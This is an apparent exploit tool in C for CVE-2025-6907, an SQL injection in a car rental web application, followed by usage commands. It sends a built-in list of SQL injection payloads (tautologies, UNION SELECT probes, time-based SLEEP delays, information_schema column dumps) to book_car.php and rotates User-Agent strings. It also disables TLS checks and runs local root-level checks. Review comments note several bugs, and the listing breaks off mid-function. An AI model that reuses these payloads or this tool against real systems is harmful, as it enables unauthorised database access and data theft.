# gcc exploit.c argparse.c -o CVE‑2025‑6907 -lcurl
# ./CVE‑2025‑6907 -u http://127.0.0.1
1- Verbose Mode :
# ./CVE‑2025‑6907 -u http://127.0.0.1 -v
2- Full url :
# ./CVE‑2025‑6907 -i [FULL_URL]
3- Check service files (local checks of /var/www/html and the Apache process; no request is sent to a target):
# ./CVE‑2025‑6907 -c
4- Show HTTP responses :
# ./CVE‑2025‑6907 -r -u [TARGET]
File: exploit.c — Size: 30,5 KB — Lines: 896
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include "argparse.h"
#include <unistd.h>
#include <sys/syscall.h>
#include <fcntl.h>
#include <sys/time.h>
/* Size in bytes of the buffer e() formats each request URL into. */
#define FULL_URL 4500
/* Not referenced anywhere in the visible part of this file. */
#define USE_URL 4096
/* Size in bytes of the directory-entry buffers in checkFile() and checkFilesInFolder(). */
#define BUF_CHECK_FOLDER 1096
/* Copied from the -r flag in main(); when non-zero, e() prints response bodies. */
int showResponse = 0;
/* Set in main() when -i was given; e() then appends the encoded payload directly to the URL. */
int useFullurl = 0;
/* Set by checkProccess() when the process list mentions apache2 or httpd. */
int apacheRunning = 0;
/* Bound to the -v flag in main(); enables libcurl verbose output and extra diagnostics. */
int verbose = 0;
/* Bound to the -i option in main(); stays NULL when the option is absent. */
const char *inputUrl = NULL;
/*
 * Compile-time platform gate. The preprocessor keeps exactly one branch:
 * the Linux build prints a start-up banner and returns, every other build
 * prints the detected platform and terminates with status 1.
 */
void checkSystem()
{
#ifdef _WIN32
    fputs("\e[1;31m[-] Error Run Exploit !\n"
          "\e[1;31m[-] Your Os : Windows 32 bit / 64 bit !\n"
          "\e[1;31m[-] Please Change Your System on Linux !\n",
          stdout);
    exit(1);
#elif TARGET_OS_MAC
    fputs("\e[1;31m[-] Error Run Exploit !\n"
          "\e[1;31m[-] Your Os : MacOS !\n"
          "\e[1;31m[-] Please Change Your System on Linux !\n",
          stdout);
    exit(1);
#elif __linux__
    fputs("\e[1;36m[+] Exploit started successfully...\n"
          "\e[1;36m[+] Your Os : Linux !\n",
          stdout);
#else
    fputs("\e[1;31m[-] Error Run Exploit !\n"
          "\e[1;31m[-] Your Os : Unknow Os !\n"
          "\e[1;31m[-] Please Change Your System on Linux !\n",
          stdout);
    exit(1);
#endif
}
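/* Growable buffer that accumulates one HTTP response body. */
struct Mem
{
    char *buffer;   /* heap block, kept NUL-terminated by write_cb(); NULL before the first chunk */
    size_t len;     /* bytes stored, not counting the terminator */
};

/*
 * libcurl write callback: appends one received chunk to the struct Mem passed
 * as userdata and keeps the buffer NUL-terminated.
 *
 * ptr      - chunk data, size * nmemb bytes
 * userdata - struct Mem * registered with CURLOPT_WRITEDATA
 *
 * Returns the number of bytes consumed. Returning less than size * nmemb
 * (0 here) makes libcurl abort the transfer; that happens when the byte count
 * would overflow size_t or when realloc() fails. On failure the existing
 * buffer and length are left untouched.
 */
size_t write_cb(void *ptr,
                size_t size,
                size_t nmemb,
                void *userdata)
{
    struct Mem *m = (struct Mem *)userdata;

    /* size * nmemb must not wrap, otherwise the copy below would outrun the allocation. */
    if (size != 0 && nmemb > (size_t)-1 / size)
    {
        return 0;
    }
    size_t total = size * nmemb;

    /* m->len + total + 1 (terminator) must not wrap either. */
    if (total >= (size_t)-1 - m->len)
    {
        return 0;
    }

    /* Grow through a temporary so the old block is not lost when realloc() fails. */
    char *tmp = realloc(m->buffer, m->len + total + 1);
    if (!tmp)
    {
        return 0;
    }
    m->buffer = tmp;
    memcpy(m->buffer + m->len, ptr, total);
    m->len += total;
    m->buffer[m->len] = '\0';
    return total;
}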
/*
 * Substrings that e() searches for, with case-sensitive strstr(), in the body of a
 * 2xx response; the first hit makes it report the target as vulnerable.
 * The entries are database and framework error messages (MySQL, PostgreSQL,
 * SQL Server / OLE DB / ODBC, Oracle ORA- codes, DB2, Hibernate, JDBC), so a match
 * shows only that an error message reached the client.
 * NOTE(review): "Fatal error", "Database error" and "Unhandled Exception" are generic
 * and can match pages that have nothing to do with SQL, so a hit is not proof.
 * Keeping such messages out of client responses removes this signal but does not
 * repair an injectable query.
 */
const char *sql_response_signatures[] =
{
"syntax error",
"Warning: mysql_fetch_assoc()",
"Warning: mysqli_query()",
"SQLSTATE",
"Invalid query",
"Unclosed quotation mark",
"quoted string not properly terminated",
"You have an error in your SQL syntax",
"Warning: pg_query()",
"Warning: pg_send_query()",
"pg_query(): Query failed",
"Microsoft OLE DB Provider for SQL Server",
"Incorrect syntax near",
"Unclosed quotation mark after the character string",
"SQL error",
"mysql_num_rows() expects parameter",
"mysql_fetch_array() expects parameter",
"Fatal error",
"mysql_fetch_object() expects parameter",
"mysqli_fetch_assoc() expects parameter",
"mysql_fetch_row() expects parameter",
"supplied argument is not a valid MySQL",
"Warning: mssql_query()",
"syntax error at or near",
"org.hibernate.exception",
"unexpected end of SQL command",
"SQL query failed",
"database query error",
"DB2 SQL error",
"OLE DB provider returned message",
"JDBC SQL error",
"pg_fetch_array() expects parameter",
"pg_fetch_assoc() expects parameter",
"Query execution failed",
"Database error",
"Unhandled Exception",
"ORA-00933: SQL command not properly ended",
"ORA-01756: quoted string not properly terminated",
"SQL Server Error",
"mysql_numrows() expects parameter",
"mysql_num_fields() expects parameter",
"Syntax error or access violation",
"SQL syntax error",
"NativeError",
"ODBC SQL Server Driver",
"Warning: odbc_exec()",
"Warning: odbc_prepare()",
"Fatal error: Call to a member function",
};
/*
 * Pool of User-Agent header values that agent() hands out in rotation, one per request.
 * NOTE(review): the pool is a fixed set of 13 strings, so requests from this tool
 * carry one of exactly these values; the set can be matched in web server logs.
 */
const char *a[] =
{
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4043.US Safari/537.36",
"Mozilla/5.0 (Linux; Android 4.4.2; SM-P600 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.22 Safari/537.36",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36",
"Mozilla/5.0 (X11; CrOS x86_64 6812.88.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.153 Safari/537.36",
"Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0"
};
/*
 * Sets the User-Agent header of the given easy handle to the next entry of a[],
 * advancing round-robin and wrapping to the first entry after the last one.
 * The position is kept in a function-local static, so it is shared by every caller.
 */
void agent(CURL *curl)
{
    static int next = 0;
    const int pool = (int)(sizeof(a) / sizeof(a[0]));
    const char *ua = a[next];

    next = (next + 1) % pool;
    curl_easy_setopt(curl, CURLOPT_USERAGENT, ua);
}
/*
 * Test strings that e() URL-encodes and places in the request, one per request, in
 * this order. They cover the common SQL injection classes: a boolean tautology,
 * UNION SELECT probes (version, database and user), conditional SLEEP() delays,
 * an updatexml() error-based probe, a stacked statement, and an
 * information_schema.columns listing.
 * Every entry ends in the comment marker "--+". The strings travel in the URL query,
 * so a web server that logs request URLs records them in percent-encoded form.
 */
const char *payloadSql[] = {
"' OR '1'='1' --+",
"' UNION SELECT NULL,NULL,NULL --+",
"' UNION SELECT NULL,@@version,NULL --+",
"' UNION SELECT NULL,database(),user() --+",
"'/**/UNION/**/SELECT/**/NULL,version(),NULL--+",
"' OR IF(1=1, SLEEP(5), 0)--+",
"' OR IF(ASCII(SUBSTRING((SELECT database()),1,1)) > 64, SLEEP(5), 0)--+",
"\" UNION SELECT NULL,@@version,NULL --+",
"' AND updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) --+",
"' OR IF(1=1, SLEEP(3), 0) --+",
"'; SELECT user(); --+",
"' UNION SELECT 1,2,0x6461746162617365 --+",
"' UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE table_schema=database() --+"
};
/* Number of entries in sql_response_signatures; bound of the signature loop in e(). */
int numberKey = sizeof(sql_response_signatures) / sizeof(sql_response_signatures[0]);
/*
 * Sends each entry of payloadSql to the target over HTTP and classifies the reply.
 *
 * baseUrl: with useFullurl set, the URL-encoded payload is appended to it as is;
 *          otherwise the request URL is "<baseUrl>/book_car.php?fname=<payload>".
 *
 * For every request the function measures wall-clock time, reads the HTTP status and,
 * for a 2xx reply, searches the body for the strings in sql_response_signatures.
 * It stops at the first request slower than 4000 ms or at the first signature hit.
 * Nothing is returned; all results are printed.
 *
 * Request profile as built below: no method option is set on the handle (libcurl then
 * issues GET), a fixed header set is attached (among them
 * "Referer: http://example.com/", "Cache-Control: no-cache", "Pragma: no-cache"),
 * the User-Agent rotates through a[], redirects are followed and TLS certificate and
 * host-name verification are switched off.
 *
 * NOTE(review): the verdicts are heuristic. The elapsed-time test runs before the
 * transfer result is examined, so a slow or timed-out connection is reported as
 * time-based SQLi, and any 2xx page containing one of the generic signature strings
 * is reported as vulnerable.
 */
void e(const char *baseUrl)
{
char full[FULL_URL];
CURL *curl = curl_easy_init();
struct Mem chunk = { NULL, 0 };
long ht = 0;
if (!curl)
{
printf("\e[1;31m[-] Error Create Object Curl.\n");
printf("\e[1;31m[-] Please Check Your Connection, (Ex command : ip show)\n");
printf("\e[1;33m[-] Run Command ip show ...\n");
const char *command = "ip show";
const char *argv[] = { NULL, command };
const char *envp[] = { NULL };
/*
 * Raw x86-64 Linux syscalls: 59 (execve) with the path "ip show", then 60 (exit)
 * with status 0.
 * NOTE(review): argv[0] is NULL and the path is the literal string "ip show", so the
 * execve presumably fails and the process then exits with status 0; the goto after
 * the asm is not reached either way. The clobber list omits rcx, r11 and "memory",
 * which the syscall instruction and the kernel may modify.
 */
__asm__ volatile
(
"mov $59, %%rax\n\t"
"mov %[command], %%rdi\n\t"
"mov %[argv], %%rsi\n\t"
"mov %[envp], %%rdx\n\t"
"syscall\n\t"
"mov $60, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:[command] "r" (command),
[argv] "r" (argv),
[envp] "r" (envp)
:"rax", "rdi", "rsi", "rdx"
);
goto exit;
}
/* An empty string asks libcurl to offer every content encoding it was built with. */
curl_easy_setopt(curl,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
/* Response bodies are collected into chunk by write_cb(). */
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&chunk);
/* 5 s to connect, 10 s for the whole transfer. */
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
/* TLS peer and host-name verification are disabled for every request. */
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
if (verbose)
{
curl_easy_setopt(curl,
CURLOPT_VERBOSE,
1L);
}
int numberPayload = sizeof(payloadSql) / sizeof(payloadSql[0]);
for (int p = 0; p < numberPayload; ++p)
{
const char *payload = payloadSql[p];
/* One less than the string length; used only by the verbose print below. */
size_t lenPayload = strlen(payload) - 1;
/* Length 0 makes libcurl measure the string itself. */
char *esc = curl_easy_escape(curl,
payload,
0);
if (!esc)
{
fprintf(stderr,
"\e[1;31m[-] URL-encoding failed for payload\n");
continue;
}
/* NOTE(review): snprintf truncation of the URL is not detected in either branch. */
if (useFullurl)
{
snprintf(full,
sizeof(full),
"%s%s",
baseUrl,
esc);
}
else
{
snprintf(full,
sizeof(full),
"%s/book_car.php?fname=%s",
baseUrl,
esc);
}
if (verbose)
{
/* Prints the payload index, the address range of the string in this process and lenPayload. */
printf("\e[1;35m[payload] [%02d] %p-%p %08zx \e[0m\n",
p,
(void*)payload,
(void*)(payload + lenPayload),
lenPayload);
}
curl_free(esc);
/*
 * The header list is rebuilt for every request.
 * NOTE(review): it is released only at the bottom of the loop body, so the break and
 * the goto further down leave it allocated. The Accept-Encoding header is also set by
 * hand here in addition to CURLOPT_ACCEPT_ENCODING above; whether the linked libcurl
 * can decode "br" is not visible from this file (confirm).
 */
struct curl_slist *h = NULL;
h = curl_slist_append(h,
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
h = curl_slist_append(h,
"Accept-Encoding: gzip, deflate, br");
h = curl_slist_append(h,
"Accept-Language: en-US,en;q=0.5");
h = curl_slist_append(h,
"Connection: keep-alive");
h = curl_slist_append(h,
"Referer: http://example.com/");
h = curl_slist_append(h,
"Cache-Control: no-cache");
h = curl_slist_append(h,
"Pragma: no-cache");
curl_easy_setopt(curl,
CURLOPT_HTTPHEADER,
h);
/* Drop the previous response so each body is inspected on its own. */
if (chunk.buffer)
{
free(chunk.buffer);
chunk.buffer = NULL;
}
chunk.len = 0;
printf("\e[1;34m[+] Full Format Url : %s", full);
curl_easy_setopt(curl,
CURLOPT_URL,
full);
agent(curl);
/* Wall-clock duration of the transfer, in milliseconds. */
struct timeval start, end;
gettimeofday(&start,
NULL);
CURLcode r = curl_easy_perform(curl);
gettimeofday(&end,
NULL);
long elapsed = (end.tv_sec - start.tv_sec) * 1000 +
(end.tv_usec - start.tv_usec) / 1000;
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&ht);
/*
 * Anything slower than 4 s is taken as a time-based hit, whatever r says.
 * NOTE(review): the second printf has a %ld conversion but no argument, and the third
 * passes elapsed to a format without a conversion; the first case is undefined behaviour.
 */
if (elapsed > 4000)
{
printf("\e[1;32m[+] Check Time-Based Blind SQLi on Target...\n");
printf("\e[1;32m[+] Time-Delay Detected (%ld ms)\n");
printf("\e[1;32m[+] Target likely VULNERABLE to Time-Based Blind SQLi!\n", elapsed);
break;
}
if (r != CURLE_OK)
{
printf("\e[1;33m[!] Please Check Your Connection on Server !\n");
printf("\e[1;33m[!] Exemple Command Check Access Connection : ping google.com\n");
printf("\e[1;34m[*] Run Command For Check Your Connection : ping -c 5 8.8.8.8");
const char *command = "/bin/ping";
char *const argv[] = {"ping", "-c", "2", "8.8.8.8", NULL};
const char *envp[] = {NULL};
/*
 * Raw syscalls again: 59 (execve) of /bin/ping with the argv above and an empty
 * environment, then 60 (exit) with status 0 if the execve returns.
 * NOTE(review): a successful execve replaces this process, and a failed one is
 * followed by exit, so the fprintf of the curl error below is not reached. The
 * message above announces "-c 5" while argv passes "-c", "2".
 */
__asm__ volatile
(
"mov $59, %%rax\n\t"
"mov %[command], %%rdi\n\t"
"mov %[argv], %%rsi\n\t"
"mov %[envp], %%rdx\n\t"
"syscall\n\t"
"mov $60, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:[command] "r" (command),
[argv] "r" (argv),
[envp] "r" (envp)
:"rax", "rdi", "rsi", "rdx"
);
fprintf(stderr,
"\e[1;31m[-] curl error: %s\n",
curl_easy_strerror(r));
}
else
{
printf("\e[1;34m\n[+] Request Send Success !\n");
printf("\e[1;32m[+] HTTP CODE : %ld\n", ht);
if (ht >= 200 &&
ht <300)
{
printf("\e[1;34m[+] The payload was successfully responded to by the server !\n");
int found = 0;
/*
 * First signature found in the body wins.
 * NOTE(review): chunk.buffer is still NULL when the response had no body (write_cb
 * was never called), and strstr() on NULL is undefined behaviour.
 */
for (int k = 0; k< numberKey; ++k)
{
if (strstr(chunk.buffer, sql_response_signatures[k]))
{
printf("\e[1;34m[+] A suspicious word was found: %s\n",
sql_response_signatures[k]);
printf("\e[1;34m[+] The server is vulnerable to CVE‑2025‑6907 !\n");
found = 1;
break;
}
}
if (!found)
{
printf("\e[1;31m[-] No suspicious patterns found in response for this payload.\n");
if (showResponse)
{
printf("\e[1;33m-------------------------------- Response Server --------------------------------\n");
printf("%s\n",
chunk.buffer);
printf("\e[1;33m-----------------------------------------------------------------------------------\n");
}
printf("\e[0;36m[*] Trying next payload...\n\n");
printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n");
}
else
{
if (showResponse)
{
/* NOTE(review): the first printf passes chunk.buffer to a format that has no conversion. */
printf("\e[1;33m-------------------------------- Response Server --------------------------------\n", chunk.buffer);
printf("%s",
chunk.buffer);
printf("\e[1;33m-----------------------------------------------------------------------------------\n");
}
/* A signature hit ends the run; the header list h is not freed on this path. */
goto exit;
}
}
else
{
printf("\e[1;31m[-] Unexpected HTTP code %ld for this payload, trying next...\n\n", ht);
}
}
curl_slist_free_all(h);
h = NULL;
}
/* NOTE(review): this line is also printed after the time-delay break above. */
printf("\e[1;31m[-] All payloads tested. No SQLi signature detected.\n");
/* Common cleanup; the label is named like the libc function exit() but is only a jump target. */
exit:
if (chunk.buffer)
{
free(chunk.buffer);
}
if (curl)
{
curl_easy_cleanup(curl);
}
}
/* Bound to the -c flag in main(); when non-zero the local service checks are run. */
int runS = 0;
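/*
 * Looks for the application's file and directory names directly inside
 * folderPath on the local machine and prints which ones are present.
 *
 * folderPath - directory to inspect; checkFile() passes sub-directories of
 *              /var/www/html.
 *
 * Returns 0 once the report has been printed, -1 when the directory cannot
 * be opened or read.
 *
 * The directory is read with getdents64(2) until the kernel reports the end,
 * so entries beyond the first buffer-full are not missed.
 */
int checkFilesInFolder(const char *folderPath)
{
    /* Record layout filled in by getdents64(2). */
    struct linux_dirent64
    {
        unsigned long long d_ino;
        long long d_off;
        unsigned short d_reclen;
        unsigned char d_type;
        char d_name[];
    };
    /* Names to look for; the duplicated "my-booking.php" entry was dropped. */
    static const char *const filesToCheck[] =
    {
        "book_car.php",
        "my-booking.php",
        "booking.php",
        "include",
        "admin",
        "assets",
        "car-listing.php",
        "check_availability.php",
        "contact-us.php",
        "index.php",
        "logout.php",
        "my-testimonials.php",
        "page.php",
        "post-testimonial.php",
        "profile.php",
        "search-carresult.php",
        "update-password.php",
        "vehical-details.php"
    };
    enum { numberFiles = sizeof(filesToCheck) / sizeof(filesToCheck[0]) };
    int foundFiles[numberFiles] = { 0 };
    /* Records begin with 64-bit fields, so the raw buffer is kept 8-byte aligned. */
    char buffer[BUF_CHECK_FOLDER] __attribute__((aligned(8)));
    int batches = 0;

    int fd = open(folderPath, O_RDONLY | O_DIRECTORY);
    if (fd < 0)
    {
        perror("[-] Error open folder");
        return -1;
    }

    for (;;)
    {
        long nread = syscall(SYS_getdents64, fd, buffer, sizeof(buffer));
        /* A failure, or nothing at all on the very first read, is reported as an error. */
        if (nread < 0 || (nread == 0 && batches == 0))
        {
            printf("\e[1;31m[-] Error reading folder content: %s\n", folderPath);
            close(fd);
            return -1;
        }
        if (nread == 0)
        {
            break;  /* end of directory */
        }
        batches++;

        long bpos = 0;
        while (bpos < nread)
        {
            struct linux_dirent64 *d = (struct linux_dirent64 *)(buffer + bpos);
            if (d->d_reclen == 0)
            {
                break;  /* a zero-length record would never advance bpos */
            }
            for (int i = 0; i < numberFiles; i++)
            {
                if (strcmp(d->d_name, filesToCheck[i]) == 0)
                {
                    foundFiles[i] = 1;
                }
            }
            bpos += d->d_reclen;
        }
    }
    close(fd);

    int showAn = 0;
    printf("\e[1;35m\n[+] Step 2 : Check the files inside the folder...\n");
    printf("\e[1;37m-----------------------------------------------------------------------------------------------\n");
    for (int i = 0; i < numberFiles; i++)
    {
        if (!foundFiles[i])
        {
            if (verbose)
            {
                /* The separator was the invalid escape "\%" before; it is a path slash now. */
                printf("[-] File not Found : %s/%s\n", folderPath, filesToCheck[i]);
            }
            continue;
        }
        if (!showAn)
        {
            printf("\e[1;34m[+] Analysis File Code-PROJECTS...\n");
            showAn = 1;
        }
        printf("\e[1;34m[+] Found file code-projects Car : %s/%s\n",
               folderPath,
               filesToCheck[i]);
        /*
         * The summary is printed as soon as any one of these three names is
         * present, and the scan of the list stops there.
         * NOTE(review): the summary names my-booking.php as the vulnerable file,
         * while e() sends its requests to book_car.php; confirm which is meant.
         */
        if (strcmp(filesToCheck[i], "my-booking.php") == 0 ||
            strcmp(filesToCheck[i], "car-listing.php") == 0 ||
            strcmp(filesToCheck[i], "page.php") == 0)
        {
            printf("\e[1;33m-----------------------------------Result Check File-----------------------------------\n");
            printf("\e[1;34m[+] File my-booking.php : The file that causes the SQL vulnerability\n");
            printf("\e[1;34m[+] File page.php : Service display page\n");
            printf("\e[1;34m[+] File car-listing.php : Car information file\n");
            printf("\e[1;34m[+] All files that confirm the service are present !!\n");
            printf("\e[1;33m----------------------------------------------------------------------------------------\n");
            break;
        }
        fflush(stdout);
    }
    return 0;
}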
/*
 * Local check, step 1: lists /var/www/html on the machine the tool runs on and looks
 * for sub-directories whose name equals one of the entries in nameFolder. Every match
 * is passed to checkFilesInFolder().
 *
 * Returns 0 after the scan, -1 when the directory listing could not be read.
 *
 * The directory is opened and read with raw x86-64 Linux syscalls in inline assembly
 * (1 = write, 2 = open, 217 = getdents64) instead of the libc wrappers.
 */
int checkFile()
{
/* NOTE(review): exp is not used anywhere in this function. */
const char *exp = "\e[1;35m[+] Service search argument is enabled on your system";
char buffer[BUF_CHECK_FOLDER];
const char *step1 = "\e[1;33m[+] An attempt to search within the /var/www/html directory has been initiated...\n";
printf("\e[1;35m[+] Step 1 : Check Folder Service ...\n");
/* One less than the string length, so the write below leaves out the final character. */
size_t step1Len = strlen(step1) - 1;
const char *path = "/var/www/html";
const char *errorMessage = "\e[1;31m[-] Error Check Path /var/www/html !\n";
size_t lenError = strlen(errorMessage);
int fd;
/*
 * write(1, step1, step1Len); then open(path, 0, 0). A non-negative result is copied
 * to fd; a negative one writes errorMessage to descriptor 1 and loads -1 into eax.
 * NOTE(review): on the failure path nothing is stored into the output operand, and
 * rax is a declared clobber so the output cannot be that register; fd therefore looks
 * indeterminate when the open fails (confirm). There is no "memory" clobber.
 */
__asm__ volatile (
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[step1], %%rsi\n\t"
"mov %[step1Len], %%rdx\n\t"
"syscall\n\t"
"mov $2, %%rax\n\t"
"mov %[pth], %%rdi\n\t"
"mov $0, %%rsi\n\t"
"mov $0, %%rdx\n\t"
"syscall\n\t"
"cmp $0, %%rax\n\t"
"jl 1f\n\t"
"mov %%eax, %0\n\t"
"jmp 2f\n"
"1:\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[err_msg], %%rsi\n\t"
"mov %[err_len], %%rdx\n\t"
"syscall\n\t"
"mov $-1, %%eax\n\t"
"2:\n\t"
: "=r"(fd)
: [step1] "r"(step1),
[step1Len] "r"(step1Len),
[pth] "r"(path),
[err_msg] "r"(errorMessage),
[err_len] "r"(lenError)
: "rax","rdi","rsi","rdx","rcx","r11"
);
/*
 * getdents64(fd, buffer, BUF_CHECK_FOLDER): one call only, so only the entries that
 * fit into the buffer are seen.
 * NOTE(review): the kernel writes into buffer, yet the asm declares no "memory"
 * clobber and no output for it; the compiler is not told that buffer changed.
 */
int32_t nread;
__asm__ volatile
(
"mov $217, %%rax\n\t"
"syscall\n\t"
: "=a"(nread)
: "D"(fd),
"S"(buffer),
"d"((unsigned long)BUF_CHECK_FOLDER)
: "rcx", "r11"
);
/* A negative errno value or an empty result both end the check here. */
if (nread <= 0)
{
const char *errorContent = "\e[1;31m[-] Error Check Content Folder !\n";
size_t lenCheck = strlen(errorContent);
write(1,
errorContent,
lenCheck);
close(fd);
return -1;
}
/* Record layout that the loop below assumes for the getdents64 output. */
struct linux_dirent64
{
unsigned long long d_ino;
long long d_off;
unsigned short d_reclen;
unsigned char d_type;
char d_name[];
};
/* Directory names tried; comparison is exact and case-sensitive (strcmp). */
const char *nameFolder[] =
{
"care",
"online_care",
"online_care_rental",
"rental_care",
"online",
"Care_online",
"my_care",
"car_rental",
"rental_system",
"car_booking",
"book_car",
"booking",
"car_rentals",
"car_rental_system",
"rental",
"car_service",
"rental_service",
"car_rental_app",
"rental_app",
"carrental",
"onlinerental",
"onlinerentalcar",
"rentals",
"carhire",
"autocare",
"carshare",
"online_car_rental",
"vehicles",
"fleet",
"fleet_management",
"car_fleet",
"my_rental",
"online_rent",
"auto_rent",
"car_rental_project",
"online_car_rental_service"
};
const int numberName = sizeof(nameFolder) / sizeof(nameFolder[0]);
/* One flag per nameFolder entry; a variable-length array, hence the memset. */
int foundName[numberName];
memset(foundName,
0,
sizeof(foundName));
/* Walk the packed records; d_reclen gives the distance to the next one. */
int bpos = 0;
while (bpos < nread) {
struct linux_dirent64 *d = (struct linux_dirent64 *)(buffer + bpos);
for (int i = 0;
i < numberName;
i++)
{
if (strcmp(d->d_name,
nameFolder[i]) == 0)
{
foundName[i] = 1;
}
}
bpos += d->d_reclen;
}
close(fd);
printf("\e[1;37m\n-----------------------------------------------------------------------------------------------\n");
for (int i = 0;
i < numberName;
i++)
{
if (foundName[i])
{
printf("\e[1;34m\n[+] Found folder: %s/%s\n",
path,
nameFolder[i]);
fflush(stdout);
/* The result of checkFilesInFolder() is not examined. */
char subfolderPath[512];
snprintf(subfolderPath, sizeof(subfolderPath), "%s/%s", path, nameFolder[i]);
checkFilesInFolder(subfolderPath);
}
/* Names that were not found are listed only in verbose mode. */
else
{
if (verbose)
{
printf("\e[1;31m\n[-] Not found : %s/%s\n",
path,
nameFolder[i]);
fflush(stdout);
}
}
}
return 0;
}
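/*
 * Local check, step 3: scans the output of a fixed "ps aux" pipeline for
 * "apache2" or "httpd", records the result in apacheRunning and, when a match
 * was seen, runs "systemctl start apache2.service".
 *
 * Returns early, after printing an error, when the pipeline cannot be started;
 * the stream is no longer passed to fgets()/pclose() as a NULL pointer.
 *
 * NOTE(review): the start command is issued only when Apache was already
 * detected, which looks inverted; the behaviour is kept, confirm the intent.
 * Both commands are fixed strings run through the shell with the privileges
 * of the caller (main() requires root).
 */
void checkProccess()
{
    char buffer[1024];
    FILE *file;

    printf("\e[1;35m[+] Step 3 : Check apache Server on System ...\n");
    file = popen("ps aux | grep -i apache | grep -v grep", "r");
    if (file == NULL)
    {
        printf("\e[1;31m[-] Error Open Proccess !\n");
        return;
    }
    while (fgets(buffer, sizeof(buffer), file) != NULL)
    {
        if (strstr(buffer, "apache2") != NULL || strstr(buffer, "httpd") != NULL)
        {
            apacheRunning = 1;
            break;
        }
    }
    pclose(file);

    printf("\e[1;34m[+] Try to run Apache...\n");
    if (!apacheRunning)
    {
        printf("\e[1;31m[-] Apache is NOT running !\n");
        return;
    }
    printf("\e[1;34m[+] Apache is running !\n");
    int check = system("systemctl start apache2.service ");
    if (check == 0)
    {
        printf("\e[1;34m[+] Server Apache Run Success !\n");
    }
    else
    {
        printf("\e[1;31m[-] Error Run Command systemctl start apache2.service !\n");
    }
}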
/*
 * Privilege gate: returns when the effective user ID is 0, otherwise prints a
 * hint and terminates the process with status 1.
 */
void runRoot()
{
    if (geteuid() == 0)
    {
        return;
    }
    fputs("\e[1;31m[-] You need to run this as root !\n"
          "\e[1;31m[-] Exemple Command : sudo su\n"
          "\e[1;31m[-] And Run Exploit , Exit...\n",
          stdout);
    exit(1);
}
/*
 * Diagnostic helper: copies /proc/self/maps (the address-space layout of this
 * process) to stdout between two banner lines. If the file cannot be opened
 * the error is reported with perror() and nothing else is printed.
 */
void memory(void)
{
    char row[256];
    FILE *maps = fopen("/proc/self/maps", "r");

    if (maps == NULL)
    {
        perror("[-] fopen(/proc/self/maps)");
        return;
    }
    fputs("\n\e[1;35m========================================[Memory Map]========================================\e[0m\n", stdout);
    /* Lines longer than the buffer simply arrive in several pieces. */
    while (fgets(row, sizeof(row), maps) != NULL)
    {
        fputs(row, stdout);
    }
    fputs("\e[1;35m=========================================================================================\e[0m\n\n", stdout);
    fclose(maps);
}
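/*
 * Prints the description of every command-line option to stdout.
 *
 * The heading is printed once (it used to be printed twice), and the examples
 * for -i and -v now use the form the option parser in main() accepts: -i takes
 * the URL as its own value, and -u takes the base URL without a path.
 */
void showHelp()
{
    printf("\e[1;37m\n[+] Explanation of the arguments:\n");
    printf("\e[1;37m\t1- *-u / --url:\n");
    printf("\e[1;37m\t\tAn argument to pass the base URL pointing to a specific file named 'book_car.php' with a query parameter 'fname'.\n");
    printf("\e[1;37m\t\tThe tool appends your input directly to this URL, creating requests like: book_car.php?fname=YOUR_INPUT\n");
    printf("\e[1;37m\t\tThis is useful for targeted testing when the vulnerable parameter is 'fname' in 'book_car.php'.\n");
    printf("\e[1;37m\t\t[+] Example: ./exploit -u http://127.0.0.1\n\n");
    printf("\e[1;37m\t2- *-r / --response:\n");
    printf("\e[1;37m\t\tShow HTTP response bodies for each request.\n");
    printf("\e[1;37m\t\tHelps inspect server feedback and error messages.\n");
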